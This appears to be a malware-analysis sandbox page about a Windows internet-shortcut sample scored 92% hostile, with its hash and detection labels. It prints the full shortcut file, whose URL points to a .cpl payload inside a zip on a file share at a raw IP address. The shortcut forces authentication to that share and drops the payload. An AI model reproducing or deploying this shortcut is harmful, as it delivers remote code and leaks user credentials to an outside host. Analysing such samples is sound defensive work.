Hostile 92% Download

b4ff46c2f843a1f69b7ffae5efa6a1821bc6f8ebca5d52e91792f40bcc2933f0.url

URL shortcut drops remote .cpl payload

External-share shortcut coerces authenticationURL shortcut targets an IP file share
SHA-256b4ff46c2f843a1f69b7ffae5efa6a1821bc6f8ebca5d52e91792f40bcc2933f0
MaleculeO₂(CaC)Md

Evidence

URL shortcut targets an IP file share lines 1–8
1[InternetShortcut]
2IconIndex=70
3HotKey=0
4IDList=
5URL=file://62.173.146.112\scarica\processo.zip\processo.cpl
6IconFile=C:\Windows\system32\SHELL32.dll
7[{000214A0-0000-0000-C000-000000000046}]
8Prop3=19,9

Keyboard shortcuts on this page: j for the next sample, k for the previous one, x to go back to the feed, d to download the original bytes, r to re-queue the sample for analysis.